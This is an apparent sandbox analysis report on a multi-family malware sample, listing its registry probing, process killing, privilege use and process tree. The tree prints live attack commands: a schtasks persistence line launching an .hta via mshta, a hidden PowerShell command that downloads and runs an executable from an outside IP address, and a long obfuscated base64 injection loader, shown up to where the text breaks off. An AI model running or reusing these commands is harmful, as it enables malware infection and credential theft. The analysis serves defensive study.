Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7ac44a072c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PQPYAYJJ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4892	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 64 IoCs

defense_evasion

pid	Process
2432	taskkill.exe
3564	taskkill.exe
3732	taskkill.exe
2888	taskkill.exe
5716	taskkill.exe
944	taskkill.exe
312	taskkill.exe
4752	taskkill.exe
4616	taskkill.exe
6096	taskkill.exe
3480	taskkill.exe
5820	taskkill.exe
1996	taskkill.exe
2476	taskkill.exe
6132	taskkill.exe
5496	taskkill.exe
4760	taskkill.exe
1912	taskkill.exe
1896	taskkill.exe
3232	taskkill.exe
1200	taskkill.exe
396	taskkill.exe
4308	taskkill.exe
400	taskkill.exe
4804	taskkill.exe
4376	taskkill.exe
764	taskkill.exe
1628	taskkill.exe
2432	taskkill.exe
6060	taskkill.exe
5816	taskkill.exe
4080	taskkill.exe
4376	taskkill.exe
5760	taskkill.exe
312	taskkill.exe
1804	taskkill.exe
2900	taskkill.exe
1960	taskkill.exe
4824	taskkill.exe
4928	taskkill.exe
3364	taskkill.exe
1436	taskkill.exe
2772	taskkill.exe
5028	taskkill.exe
5904	taskkill.exe
536	taskkill.exe
5508	taskkill.exe
4888	taskkill.exe
4696	taskkill.exe
4380	taskkill.exe
2896	taskkill.exe
3544	taskkill.exe
2752	taskkill.exe
4940	taskkill.exe
5532	taskkill.exe
4864	taskkill.exe
4540	taskkill.exe
3904	taskkill.exe
6100	taskkill.exe
1180	taskkill.exe
1376	taskkill.exe
3216	taskkill.exe
2572	taskkill.exe
396	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880356464709917"	chrome.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-446031748-3036493239-2009529691-1000\{244078B9-2488-4F35-A67C-2515BD8B2B08}	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-446031748-3036493239-2009529691-1000\{67E3C241-AC39-40A3-9348-D365F74069CE}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3429073751.txt\	cmd.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6028	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2988	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4552	powershell.exe
4552	powershell.exe
4932	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE
4932	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE
3208	rapes.exe
3208	rapes.exe
5520	MSBuild.exe
5520	MSBuild.exe
5520	MSBuild.exe
5520	MSBuild.exe
2988	powershell.exe
2988	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
1960	rapes.exe
1960	rapes.exe
6028	captcha.exe
6028	captcha.exe
6028	captcha.exe
6028	captcha.exe
6028	captcha.exe
6028	captcha.exe
5856	powershell.exe
5856	powershell.exe
5856	powershell.exe
220	powershell.exe
220	powershell.exe
220	powershell.exe
4272	powershell.exe
4272	powershell.exe
4272	powershell.exe
3020	7ac44a072c.exe
3020	7ac44a072c.exe
4304	MSBuild.exe
4304	MSBuild.exe
4304	MSBuild.exe
4304	MSBuild.exe
1960	chrome.exe
1960	chrome.exe
1960	chrome.exe
4080	MSBuild.exe
4080	MSBuild.exe
4080	MSBuild.exe
4080	MSBuild.exe
4848	MSBuild.exe
4848	MSBuild.exe
4848	MSBuild.exe
4848	MSBuild.exe
3016	Passwords.com
3016	Passwords.com
3016	Passwords.com
3016	Passwords.com
3016	Passwords.com
3016	Passwords.com
3204	Abspawnhlp.exe
5580	Abspawnhlp.exe
5580	Abspawnhlp.exe
5580	Abspawnhlp.exe
5580	Abspawnhlp.exe
5580	Abspawnhlp.exe
5580	Abspawnhlp.exe
5016	50702d4ef9.exe
5016	50702d4ef9.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
660	Process not Found
660	Process not Found
6132	tzutil.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
5580	Abspawnhlp.exe
5580	Abspawnhlp.exe
4472	p3hx1_003.exe
4472	p3hx1_003.exe
4472	p3hx1_003.exe
5580	Abspawnhlp.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	4896	tasklist.exe
Token: SeDebugPrivilege	2400	tasklist.exe
Token: SeDebugPrivilege	6128	tasklist.exe
Token: SeDebugPrivilege	2352	tasklist.exe
Token: SeDebugPrivilege	5856	powershell.exe
Token: SeDebugPrivilege	3220	tasklist.exe
Token: SeDebugPrivilege	3768	tasklist.exe
Token: SeDebugPrivilege	2356	tasklist.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeDebugPrivilege	5440	tasklist.exe
Token: SeDebugPrivilege	1216	tasklist.exe
Token: SeIncreaseQuotaPrivilege	220	powershell.exe
Token: SeSecurityPrivilege	220	powershell.exe
Token: SeTakeOwnershipPrivilege	220	powershell.exe
Token: SeLoadDriverPrivilege	220	powershell.exe
Token: SeSystemProfilePrivilege	220	powershell.exe
Token: SeSystemtimePrivilege	220	powershell.exe
Token: SeProfSingleProcessPrivilege	220	powershell.exe
Token: SeIncBasePriorityPrivilege	220	powershell.exe
Token: SeCreatePagefilePrivilege	220	powershell.exe
Token: SeBackupPrivilege	220	powershell.exe
Token: SeRestorePrivilege	220	powershell.exe
Token: SeShutdownPrivilege	220	powershell.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeSystemEnvironmentPrivilege	220	powershell.exe
Token: SeRemoteShutdownPrivilege	220	powershell.exe
Token: SeUndockPrivilege	220	powershell.exe
Token: SeManageVolumePrivilege	220	powershell.exe
Token: 33	220	powershell.exe
Token: 34	220	powershell.exe
Token: 35	220	powershell.exe
Token: 36	220	powershell.exe
Token: SeDebugPrivilege	1896	tasklist.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeDebugPrivilege	4828	tasklist.exe
Token: SeDebugPrivilege	5652	tasklist.exe
Token: SeDebugPrivilege	3544	tasklist.exe
Token: SeDebugPrivilege	4292	tasklist.exe
Token: SeDebugPrivilege	3500	tasklist.exe
Token: SeDebugPrivilege	2752	taskkill.exe
Token: SeDebugPrivilege	3948	tasklist.exe
Token: SeDebugPrivilege	1376	taskkill.exe
Token: SeDebugPrivilege	5760	taskkill.exe
Token: SeDebugPrivilege	5816	taskkill.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	5716	taskkill.exe
Token: SeDebugPrivilege	4940	taskkill.exe
Token: SeDebugPrivilege	3216	taskkill.exe
Token: SeDebugPrivilege	2432	taskkill.exe
Token: SeDebugPrivilege	3480	taskkill.exe
Token: SeDebugPrivilege	1200	taskkill.exe
Token: SeDebugPrivilege	2572	taskkill.exe
Token: SeDebugPrivilege	396	taskkill.exe
Token: SeDebugPrivilege	3564	taskkill.exe
Token: SeDebugPrivilege	1896	taskkill.exe
Token: SeDebugPrivilege	5508	taskkill.exe
Token: SeDebugPrivilege	5028	taskkill.exe
Token: SeDebugPrivilege	400	taskkill.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeDebugPrivilege	5532	taskkill.exe
Token: SeDebugPrivilege	3732	taskkill.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1960	chrome.exe
4772	msedge.exe
3016	Passwords.com
3016	Passwords.com
3016	Passwords.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3016	Passwords.com
3016	Passwords.com
3016	Passwords.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5960 wrote to memory of 3064	5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 5960 wrote to memory of 3064	5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 5960 wrote to memory of 3064	5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 5960 wrote to memory of 5600	5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 5960 wrote to memory of 5600	5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 5960 wrote to memory of 5600	5960	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 3064 wrote to memory of 6028	3064	cmd.exe	91
PID 3064 wrote to memory of 6028	3064	cmd.exe	91
PID 3064 wrote to memory of 6028	3064	cmd.exe	91
PID 5600 wrote to memory of 4552	5600	mshta.exe	92
PID 5600 wrote to memory of 4552	5600	mshta.exe	92
PID 5600 wrote to memory of 4552	5600	mshta.exe	92
PID 4552 wrote to memory of 4932	4552	powershell.exe	101
PID 4552 wrote to memory of 4932	4552	powershell.exe	101
PID 4552 wrote to memory of 4932	4552	powershell.exe	101
PID 4932 wrote to memory of 3208	4932	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE	102
PID 4932 wrote to memory of 3208	4932	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE	102
PID 4932 wrote to memory of 3208	4932	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE	102
PID 3208 wrote to memory of 2888	3208	rapes.exe	106
PID 3208 wrote to memory of 2888	3208	rapes.exe	106
PID 2888 wrote to memory of 5520	2888	YGYZCmt.exe	107
PID 2888 wrote to memory of 5520	2888	YGYZCmt.exe	107
PID 2888 wrote to memory of 5520	2888	YGYZCmt.exe	107
PID 2888 wrote to memory of 5520	2888	YGYZCmt.exe	107
PID 2888 wrote to memory of 5520	2888	YGYZCmt.exe	107
PID 2888 wrote to memory of 5520	2888	YGYZCmt.exe	107
PID 2888 wrote to memory of 5520	2888	YGYZCmt.exe	107
PID 2888 wrote to memory of 5520	2888	YGYZCmt.exe	107
PID 2888 wrote to memory of 5520	2888	YGYZCmt.exe	107
PID 3208 wrote to memory of 1060	3208	rapes.exe	108
PID 3208 wrote to memory of 1060	3208	rapes.exe	108
PID 3208 wrote to memory of 1060	3208	rapes.exe	108
PID 1060 wrote to memory of 3260	1060	cmd.exe	110
PID 1060 wrote to memory of 3260	1060	cmd.exe	110
PID 1060 wrote to memory of 3260	1060	cmd.exe	110
PID 3260 wrote to memory of 2988	3260	cmd.exe	112
PID 3260 wrote to memory of 2988	3260	cmd.exe	112
PID 3260 wrote to memory of 2988	3260	cmd.exe	112
PID 2988 wrote to memory of 2900	2988	powershell.exe	113
PID 2988 wrote to memory of 2900	2988	powershell.exe	113
PID 2988 wrote to memory of 2900	2988	powershell.exe	113
PID 3208 wrote to memory of 6028	3208	rapes.exe	116
PID 3208 wrote to memory of 6028	3208	rapes.exe	116
PID 6028 wrote to memory of 5704	6028	captcha.exe	117
PID 6028 wrote to memory of 5704	6028	captcha.exe	117
PID 6028 wrote to memory of 5792	6028	captcha.exe	120
PID 6028 wrote to memory of 5792	6028	captcha.exe	120
PID 5792 wrote to memory of 968	5792	net.exe	122
PID 5792 wrote to memory of 968	5792	net.exe	122
PID 6028 wrote to memory of 3592	6028	captcha.exe	123
PID 6028 wrote to memory of 3592	6028	captcha.exe	123
PID 6028 wrote to memory of 4896	6028	captcha.exe	125
PID 6028 wrote to memory of 4896	6028	captcha.exe	125
PID 6028 wrote to memory of 2400	6028	captcha.exe	127
PID 6028 wrote to memory of 2400	6028	captcha.exe	127
PID 6028 wrote to memory of 6128	6028	captcha.exe	129
PID 6028 wrote to memory of 6128	6028	captcha.exe	129
PID 6028 wrote to memory of 2352	6028	captcha.exe	131
PID 6028 wrote to memory of 2352	6028	captcha.exe	131
PID 6028 wrote to memory of 4608	6028	captcha.exe	132
PID 6028 wrote to memory of 4608	6028	captcha.exe	132
PID 6028 wrote to memory of 5856	6028	captcha.exe	135
PID 6028 wrote to memory of 5856	6028	captcha.exe	135
PID 3208 wrote to memory of 4872	3208	rapes.exe	137

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2664
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1984

C:\Users\Admin\AppData\Local\Temp\2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn g0V3Zma43UM /tr "mshta C:\Users\Admin\AppData\Local\Temp\LlO6hk3Ax.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn g0V3Zma43UM /tr "mshta C:\Users\Admin\AppData\Local\Temp\LlO6hk3Ax.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:6028
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\LlO6hk3Ax.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5600
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Users\Admin\AppData\Local\TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE
      "C:\Users\Admin\AppData\Local\TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4932
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3208
      - C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2888
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5520
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1060
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVt